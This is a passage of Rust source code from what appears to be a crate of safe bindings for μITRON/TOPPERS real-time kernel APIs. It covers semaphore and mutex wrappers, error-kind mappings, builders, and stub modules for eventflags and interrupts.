#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for WaitTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::poll`].
pub enum PollError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for PollError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::initialize`].
pub enum InitializeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InitializeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::info`].
pub enum InfoError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InfoError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`Semaphore::build`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum BuildError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
/// Ran out of semaphore IDs.
#[cfg(not(feature = "none"))]
OutOfMemory,
/// Bad parameter.
#[cfg(not(feature = "none"))]
BadParam,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACV` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_NOID => Some(Self::OutOfMemory(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::delete`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum DeleteError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
BadState,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
/// Semaphore count.
pub type Count = u32;
/// Semaphore information returned by [`SemaphoreRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
#[cfg(not(feature = "none"))]
raw: abi::T_RSEM,
}
impl Info {
/// Get the semaphore's count.
#[inline]
pub fn count(&self) -> Count {
match () {
#[cfg(not(feature = "none"))]
() => self.raw.semcnt,
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the first waiting task's ID.
#[inline]
pub fn first_waiting_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.wtskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// A borrowed reference to a semaphore.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct SemaphoreRef<'a> {
id: abi::NonNullID,
_phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for SemaphoreRef<'_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "Semaphore({})", self.id)
}
}
/// # Object ID conversion
impl SemaphoreRef<'_> {
/// Construct a `SemaphoreRef` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self {
id,
_phantom: PhantomData,
}
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(self) -> abi::ID {
self.id.get()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(self) -> abi::NonNullID {
self.id
}
}
/// # Management
impl SemaphoreRef<'_> {
/// `del_sem`: Delete the semaphore.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_sem")]
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_sem(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ref_sem`: Get the semaphore's general information.
#[inline]
#[doc(alias = "ref_sem")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_sem(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Semaphore Operations
impl SemaphoreRef<'_> {
/// `sig_sem`: Increment the semaphore count by one.
#[inline]
#[doc(alias = "sig_sem")]
pub fn signal(self) -> Result<(), Error<SignalError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::sig_sem(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `wai_sem`: Decrement the semaphore count by one. Blocks the current
/// task if the new value is negative.
#[inline]
#[doc(alias = "wai_sem")]
pub fn wait(self) -> Result<(), Error<WaitError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::wai_sem(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `twai_sem`: Decrement the semaphore count by one. Blocks the current
/// task with timeout if the new value is negative.
#[inline]
#[doc(alias = "twai_sem")]
pub fn wait_timeout(self, tmo: Timeout) -> Result<(), Error<WaitTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::twai_sem(self.as_raw(), tmo.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `pol_sem`: Decrement the semaphore count by one. Fails and returns
/// immediately if the new value is negative.
#[inline]
#[doc(alias = "pol_sem")]
pub fn poll(self) -> Result<(), Error<PollError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::pol_sem(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ini_sem`: Initialize the semaphore.
#[inline]
#[doc(alias = "ini_sem")]
pub fn initialize(self) -> Result<(), Error<InitializeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ini_sem(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
use crate::wait::QueueOrder;
/// The builder type for [semaphores](Semaphore). Created by [`Semaphore::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder {
initial_default: bool,
#[cfg(not(feature = "none"))]
raw: abi::T_CSEM,
}
impl Semaphore {
/// `acre_sem`: Create a builder for `Semaphore`.
///
/// # Examples
///
/// ```rust,no_run
/// use itron::semaphore::Semaphore;
/// let binary_semaphore = Semaphore::build()
/// .finish()
/// .expect("failed to create a semaphore");
///
/// binary_semaphore.as_ref().wait()
/// .expect("failed to perform a wait operation");
/// binary_semaphore.as_ref().signal()
/// .expect("failed to perform a signal operation");
/// ```
///
/// ```rust,no_run
/// use itron::{semaphore::Semaphore, wait::QueueOrder};
/// let counting_semaphore = Semaphore::build()
/// .initial_count(4)
/// .max_count(8)
/// .queue_order(QueueOrder::TaskPriority)
/// .finish()
/// .expect("failed to create a semaphore");
///
/// for _ in 0..4 {
/// counting_semaphore.as_ref().poll()
/// .expect("failed to perform a polling wait operation");
/// }
/// counting_semaphore.as_ref().poll()
/// .expect_err("unexpectedly succeeded to perform a polling wait operation");
///
/// for _ in 0..8 {
/// counting_semaphore.as_ref().signal()
/// .expect("failed to perform a signal operation");
/// }
/// counting_semaphore.as_ref().signal()
/// .expect_err("unexpectedly succeeded to perform a signal operation");
/// ```
#[inline]
#[doc(alias = "acre_sem")]
pub fn build() -> Builder {
Builder {
initial_default: true,
#[cfg(not(feature = "none"))]
raw: abi::T_CSEM {
sematr: abi::TA_NULL,
isemcnt: 0,
maxsem: 1,
},
}
}
}
impl Builder {
/// Specify the initial count. Defaults to `max_count` when unspecified.
#[inline]
pub fn initial_count(self, value: Count) -> Builder {
Builder {
initial_default: false,
#[cfg(not(feature = "none"))]
raw: abi::T_CSEM {
isemcnt: value,
..self.raw
},
}
}
/// Specify the maximum count. Defaults to `1` when unspecified.
#[inline]
pub fn max_count(self, value: Count) -> Builder {
Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CSEM {
maxsem: value,
..self.raw
},
..self
}
}
/// Specify the queue order. Defaults to `Fifo` when unspecified.
#[inline]
pub fn queue_order(self, value: QueueOrder) -> Builder {
Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CSEM {
sematr: value.as_raw_atr(),
..self.raw
},
..self
}
}
}
impl Builder {
/// Create a semaphore using the specified parameters.
#[allow(unused_mut)]
pub fn finish(mut self) -> Result<Semaphore, Error<BuildError>> {
#[cfg(not(feature = "none"))]
if self.initial_default {
self.raw.isemcnt = self.raw.maxsem;
}
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let id = Error::err_if_negative(abi::acre_sem(&self.raw))?;
// Safety: We own the semaphore we create
Ok(Semaphore::from_raw_nonnull(abi::NonNullID::new_unchecked(
id,
)))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// An owned semaphore.
///
/// [Deletes] the semaphore automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: SemaphoreRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub struct Semaphore(SemaphoreRef<'static>);
impl fmt::Debug for Semaphore {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.0.fmt(f)
}
}
impl Drop for Semaphore {
#[inline]
fn drop(&mut self) {
unsafe { self.0.delete().unwrap() };
}
}
impl Semaphore {
/// Construct a `Semaphore` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self(unsafe { SemaphoreRef::from_raw_nonnull(id) })
}
/// Consume and "leak" `self`, returning a reference `SemaphoreRef<'a>`.
#[inline]
pub const fn leak<'a>(self) -> SemaphoreRef<'a> {
let out = self.0;
core::mem::forget(self);
out
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.0.as_raw()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.0.as_raw_nonnull()
}
/// Borrow `Semaphore` as [`SemaphoreRef`].
///
/// Use this to perform operations on semaphores because most of the
/// methods are implemented on `SemaphoreRef` but not `Semaphore`.
#[inline]
pub const fn as_ref(&self) -> SemaphoreRef<'_> {
self.0
}
}
}
<file_sep>/src/eventflag.rs
//! Eventflags (TODO)
// TODO: acre_flg
// TODO: del_flg
// TODO: set_flg
// TODO: clr_flg
// TODO: wai_flg
// TODO: pol_flg
// TODO: twai_flg
// TODO: ini_flg
// TODO: ref_flg
<file_sep>/src/lib.rs
#![no_std]
#![cfg_attr(feature = "doc_cfg", feature(doc_cfg))]
#![cfg_attr(feature = "nightly", feature(decl_macro))]
#![doc = include_str!("lib.md")]
#![deny(unsafe_op_in_unsafe_fn)]
#![allow(clippy::match_single_binding)] // the `cfg` matching pattern
#![warn(clippy::doc_markdown)]
#![warn(clippy::enum_glob_use)]
#![warn(clippy::if_not_else)]
#![warn(rust_2018_idioms)]
#![cfg_attr(feature = "none", allow(unused_imports))]
#![cfg_attr(feature = "none", allow(unreachable_code))]
#![cfg_attr(feature = "none", allow(unused_variables))]
#![cfg_attr(feature = "none", allow(dead_code))]
/// Changelog (`CHANGELOG.md`)
///
#[doc = include_str!("../CHANGELOG.md")]
pub mod _changelog_ {}
pub mod abi;
#[cfg(all(feature = "nightly", feature = "unstable"))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(all(feature = "nightly", feature = "unstable")))
)]
pub mod macros;
macro_rules! unstable_module {
{$(
$( #[macro_use $($unused:tt)*] )*
$( #[doc = $doc:tt] )*
$( #[cfg( $($cfg:tt)* )] )?
pub mod $name:ident $semicolon_or_brace:tt
)*} => {$(
$( #[macro_use $($unused)*] )*
$( #[doc = $doc] )*
#[cfg(all(feature = "unstable", $($($cfg)*)?))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(all(feature = "unstable", $($($cfg)*)?)))
)]
pub mod $name $semicolon_or_brace
)*};
}
unstable_module! {
#[macro_use]
pub mod error;
pub mod closure;
pub mod dataqueue;
pub mod eventflag;
pub mod interrupt;
pub mod kernel;
pub mod memorypool;
#[cfg(any(
all(feature = "asp3", feature = "messagebuf"),
all(feature = "solid_asp3", feature = "messagebuf"),
feature = "none",
))]
pub mod messagebuffer;
pub mod mutex;
pub mod prioritydataqueue;
pub mod processor;
pub mod semaphore;
pub mod task;
pub mod wait;
// TODO: spinlocks
/// Temporal quantification
pub mod time {
mod duration;
mod systime;
mod timeout;
pub use self::{duration::*, systime::*, timeout::*};
// `use ::*` doesn't work with `pub macro`. This could be a bug.
#[cfg(feature = "nightly")]
pub use self::{duration::duration, timeout::timeout};
}
}
<file_sep>/src/interrupt.rs
//! Interrupts (TODO)
// TODO: acre_isr
// TODO: del_isr
// TODO: dis_int
// TODO: ena_int
// TODO: clr_int
// TODO: ras_int
// TODO: prb_int
// TODO: chg_ipm
// TODO: get_ipm
<file_sep>/src/mutex.rs
//! Mutexes
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
/// Error type for [`MutexRef::lock`].
pub enum LockError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
/// The calling task's priority is higher than the mutex's priority
/// ceiling.
///
/// # Rationale
///
/// The `EINVAL` error of `pthread_mutex_lock`. This error kind is
/// designed to accomodate any precondition violations that may occur
/// in yet-to-be-seen kernels to be supported.
#[cfg(not(feature = "none"))]
BadParam,
/// The calling task already owns the mutex.
#[cfg(not(feature = "none"))]
Deadlock,
}
}
impl ErrorKind for LockError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::Deadlock(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MutexRef::lock_timeout`].
pub enum LockTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
/// The calling task's priority is higher than the mutex's priority
/// ceiling.
///
/// # Rationale
///
/// The `EINVAL` error of `pthread_mutex_lock`. This error kind is
/// designed to accomodate any precondition violations that may occur
/// in yet-to-be-seen kernels to be supported.
#[cfg(not(feature = "none"))]
BadParam,
/// The calling task already owns the mutex.
#[cfg(not(feature = "none"))]
Deadlock,
}
}
impl ErrorKind for LockTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::Deadlock(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MutexRef::try_lock`].
pub enum TryLockError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
/// The calling task's priority is higher than the mutex's priority
/// ceiling.
///
/// # Rationale
///
/// The `EINVAL` error of `pthread_mutex_lock`. This error kind is
/// designed to accomodate any precondition violations that may occur
/// in yet-to-be-seen kernels to be supported.
#[cfg(not(feature = "none"))]
BadParam,
/// The calling task already owns the mutex.
#[cfg(not(feature = "none"))]
Deadlock,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for TryLockError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::Deadlock(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MutexRef::unlock`].
pub enum UnlockError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
/// The mutex is not the lastly-locked mutex currently owned by the
/// calling task (TOPPERS third-generation kernels, `E_OBJ`). The mutex
/// is not currently owned by the calling task (μITRON 4.0 and
/// μT-Kernel, `E_ILUSE`).
///
/// # Rationale
///
/// The name was inspired by the FTP and SMTP error 503 (bad sequence of
/// commands) and SOLID `SOLID_ERR_BADSEQUENCE`. A mutex is intended
/// to be used in a specific sequence (lock followed by unlock). The
/// TOPPERS third-generation kernels impose a more stringent requirement
/// on the sequence: mutexes must be unlocked in a lock-reverse order.
#[cfg(not(feature = "none"))]
BadSequence,
}
}
impl ErrorKind for UnlockError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadSequence(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MutexRef::initialize`].
pub enum InitializeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InitializeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MutexRef::info`].
pub enum InfoError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InfoError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`Mutex::build`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum BuildError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
/// Ran out of mutex IDs.
#[cfg(not(feature = "none"))]
OutOfMemory,
/// Bad parameter.
///
/// - The priority ceiling is out of range (NGKI2037, `E_PAR`).
///
/// - The priority ceiling refers to a priority value which is
/// configured to use subpriorities (NGKI3682, `E_ILUSE`).
///
/// - Unrecognized flags are specified (NGKI2025, `E_RSATR`).
///
#[cfg(not(feature = "none"))]
BadParam,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACV` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_NOID => Some(Self::OutOfMemory(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(any(
all(feature = "asp3", feature = "subprio"),
feature = "fmp3",
feature = "solid_fmp3"
))]
abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MutexRef::delete`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum DeleteError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
BadState,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
/// Mutex information returned by [`MutexRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
#[cfg(not(feature = "none"))]
raw: abi::T_RMTX,
}
impl Info {
/// Get the owning task's ID.
#[inline]
pub fn owning_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.htskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the first waiting task's ID.
#[inline]
pub fn first_waiting_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.wtskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// A borrowed reference to a mutex.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct MutexRef<'a> {
id: abi::NonNullID,
_phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for MutexRef<'_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "Mutex({})", self.id)
}
}
/// # Object ID conversion
impl MutexRef<'_> {
/// Construct a `MutexRef` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self {
id,
_phantom: PhantomData,
}
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(self) -> abi::ID {
self.id.get()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(self) -> abi::NonNullID {
self.id
}
}
/// # Management
impl MutexRef<'_> {
/// `del_mtx`: Delete the mutex.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_mtx")]
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_mtx(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
